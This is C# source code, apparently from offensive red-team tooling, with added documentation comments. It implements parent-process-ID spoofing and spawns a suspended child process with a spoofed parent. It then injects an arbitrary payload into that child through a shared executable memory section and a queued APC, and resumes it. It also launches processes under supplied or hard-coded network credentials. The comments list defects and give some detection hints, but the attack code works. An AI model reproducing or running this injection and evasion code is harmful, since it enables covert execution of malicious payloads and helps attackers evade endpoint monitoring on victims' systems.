/// <summary>
/// Starts <paramref name="processname"/> via the native CreateProcess with the
/// PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute set to a handle of <paramref name="ppid"/>,
/// so the new process is registered as a child of that PID rather than of the caller
/// (parent-PID spoofing). Both SECURITY_ATTRIBUTES structs are default-initialised apart from
/// nLength, and the remaining pointer arguments to CreateProcess are IntPtr.Zero.
/// </summary>
/// <param name="processname">Passed as the command-line argument of CreateProcess; the application-name argument is IntPtr.Zero.</param>
/// <param name="ppid">PID whose process handle is written into the parent-process attribute.</param>
/// <param name="cf">Creation flags, cast to uint. Per the Win32 contract the attribute list is only honoured when these include EXTENDED_STARTUPINFO_PRESENT (as the caller in this file supplies) — confirm against the flags enum.</param>
/// <param name="procInfo">Receives the PROCESS_INFORMATION produced by CreateProcess (overwritten via <c>out</c>).</param>
/// <returns>The boolean result of the native CreateProcess call.</returns>
/// <exception cref="ArgumentException">Thrown by Process.GetProcessById when no process with <paramref name="ppid"/> exists.</exception>
/// <remarks>
/// Defects present in this block, left unchanged: the return values of
/// InitializeProcThreadAttributeList and UpdateProcThreadAttribute are ignored, so a failed
/// attribute update still proceeds to CreateProcess; the four AllocHGlobal buffers and the
/// attribute list are never released (no FreeHGlobal / DeleteProcThreadAttributeList), on either
/// path; the Process object returned by GetProcessById is never disposed.
/// Defender note: the spoofed PID is what appears as the parent of the new process; telemetry that
/// records the actual creating process is what separates this from a genuine child of <paramref name="ppid"/>.
/// </remarks>
public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo)
{
    // STARTUPINFOEX carries the attribute list; cb must be the size of the extended struct.
    Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX();
    sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx);
    IntPtr lpValue = IntPtr.Zero;

    // Process and thread security attributes: only nLength is set, everything else stays default.
    Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES();
    Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES();
    pSec.nLength = Marshal.SizeOf(pSec);
    tSec.nLength = Marshal.SizeOf(tSec);
    // Both structs are copied to unmanaged memory that is never freed (leak).
    IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec));
    Marshal.StructureToPtr(pSec, pntpSec, false);
    IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec));
    Marshal.StructureToPtr(tSec, pnttSec, false);

    // Two-call pattern: first call (null list) yields the required size in lpSize,
    // second call initialises the allocated list for one attribute. Neither result is checked.
    IntPtr lpSize = IntPtr.Zero;
    Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
    sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
    Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize);

    // The attribute value is a pointer to a HANDLE of the intended parent; the Process
    // instance that owns that handle is not disposed here.
    IntPtr parentHandle = Process.GetProcessById(ppid).Handle;
    lpValue = Marshal.AllocHGlobal(IntPtr.Size);
    Marshal.WriteIntPtr(lpValue, parentHandle);
    // Return value ignored: a failure here is not detected before CreateProcess runs.
    Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

    if (!Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, (uint)cf, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo))
    {
        return(false);
    }
    return(true);
}
/// <summary>
/// Spawns <paramref name="binary"/> suspended and detached with <paramref name="ppid"/> as its
/// declared parent (via <see cref="CreateProcess"/>), shares a section between this process and the
/// child, copies <paramref name="payload"/> into the local read/write view, maps the same section
/// into the child with execute permission, queues an APC at that address on the child's initial
/// thread and resumes it. (Method name carries a typo: "Sapwn".)
/// </summary>
/// <param name="binary">Command line handed to CreateProcess.</param>
/// <param name="payload">Bytes copied into the section; its length is rounded by InjectionHelper.GetSectionSize.</param>
/// <param name="ppid">PID used as the spoofed parent.</param>
/// <returns>true only if every step succeeded; false on the first failed step.</returns>
/// <remarks>
/// Defects present in this block, left unchanged: every early <c>return(false)</c> after the spawn
/// leaves the child alive but suspended and its hProcess/hThread handles open; the section handle
/// is never closed on any path; the status returned by MapViewOfSection is not inspected (only the
/// out pointers are), and ResumeThread's result is ignored.
/// Defender note: the observable sequence — suspended child with a spoofed parent, a section mapped
/// into it with execute protection, an APC queued on a thread that has not yet run, then resume —
/// is the behavioural pattern to alert on; the executable view comes from a section rather than a
/// loaded module (presumably not file-backed — confirm in InjectionHelper.CreateSection).
/// </remarks>
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
{
    Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
    // CREATE_SUSPENDED keeps the initial thread parked until the APC is queued;
    // EXTENDED_STARTUPINFO_PRESENT is what makes the parent-process attribute take effect.
    Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS | Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;
    if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
    {
        return(false);
    }

    // Round the payload length up (helper decides the granularity; presumably page size — confirm).
    uint size = InjectionHelper.GetSectionSize(payload.Length);

    // Create the section with RWX maximum protection; the handle is never closed afterwards.
    IntPtr section = IntPtr.Zero;
    section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
    if (section == IntPtr.Zero)
    {
        // Child is left suspended with open handles from here on.
        return(false);
    }

    // Local view: read/write only, used purely to fill the section.
    IntPtr baseAddr = IntPtr.Zero;
    IntPtr viewSize = (IntPtr)size;
    InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE);
    if (baseAddr == IntPtr.Zero)
    {
        return(false);
    }

    // Copy the payload into the local view.
    Marshal.Copy(payload, 0, baseAddr, payload.Length);

    // Remote view: same section mapped into the child as execute-only.
    IntPtr baseAddrEx = IntPtr.Zero;
    IntPtr viewSizeEx = (IntPtr)size;
    InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE);
    if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
    {
        return(false);
    }

    // The local view is no longer needed; the remote one stays mapped.
    if (!InjectionHelper.UnMapViewOfSection(baseAddr))
    {
        return(false);
    }

    // Queue the remote view's base address as an APC on the child's initial thread.
    if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
    {
        return(false);
    }

    // Resume (result ignored) and release the child's handles; the section handle remains open.
    InjectionHelper.ResumeThread(procInfo);
    Natives.CloseHandle(procInfo.hThread);
    Natives.CloseHandle(procInfo.hProcess);
    return(true);
}
/// <summary>
/// Launches <paramref name="path"/> + <paramref name="binary"/> through the native
/// CreateProcessWithLogonW with LogonFlags.NetCredentialsOnly, i.e. (per the Win32 flag's
/// documented meaning) the supplied credentials are used for outbound network access while the
/// process runs under the caller's local token. <paramref name="path"/> is also used as the
/// current directory.
/// </summary>
/// <param name="username">Account name handed to the logon.</param>
/// <param name="password">Clear-text password handed to the logon.</param>
/// <param name="domain">Domain of <paramref name="username"/>.</param>
/// <param name="path">Directory prefix; concatenated with <paramref name="binary"/> without a separator, so it is expected to end with one — confirm at callers.</param>
/// <param name="binary">Executable name appended to <paramref name="path"/>.</param>
/// <param name="arguments">Appended to the command line after a single space.</param>
/// <param name="cf">Creation flags passed straight through.</param>
/// <param name="processInformation">Receives the PROCESS_INFORMATION from the native call.</param>
/// <returns>The boolean result of the native call; "Process created" is written to stdout on success.</returns>
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
    string applicationName = path + binary;
    string commandLine = applicationName + " " + arguments;

    // Only cb is populated; the native call fills in nothing else we read.
    var startupInfo = new Natives.STARTUPINFO
    {
        cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO))
    };

    bool created = Natives.CreateProcessWithLogonW(username, domain, password, Natives.LogonFlags.NetCredentialsOnly, applicationName, commandLine, cf, 0, path, ref startupInfo, out processInformation);
    if (created)
    {
        // Console side effect is part of this method's existing behaviour.
        Console.WriteLine("Process created");
    }
    return created;
}
/// <summary>
/// Convenience overload that resolves the current user's name and domain (falling back to the
/// machine name when the domain lookup throws) and delegates to the full
/// CreateProcessWithLogonW overload with the literal credential "password".
/// </summary>
/// <param name="path">Directory prefix forwarded unchanged.</param>
/// <param name="binary">Executable name forwarded unchanged.</param>
/// <param name="arguments">Command-line arguments forwarded unchanged.</param>
/// <param name="cf">Creation flags forwarded unchanged.</param>
/// <param name="processInformation">Receives the PROCESS_INFORMATION from the delegated call.</param>
/// <returns>Whatever the full overload returns.</returns>
/// <remarks>
/// SECURITY: the password is a hard-coded string literal in source. It is committed with the
/// code, cannot be rotated without a rebuild, and will be discoverable in the compiled assembly
/// as plain text. Credentials belong in a caller-supplied parameter or a secret store, not here.
/// </remarks>
public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation)
{
    // The domain lookup is guarded because the original code expects it may throw;
    // the machine name is the fallback in that case.
    string ResolveDomain()
    {
        try
        {
            return Environment.UserDomainName;
        }
        catch (Exception)
        {
            return System.Environment.MachineName;
        }
    }

    string domain = ResolveDomain();
    string username = Environment.UserName;
    return CreateProcessWithLogonW(username, "password", domain, path, binary, arguments, cf, ref processInformation);
}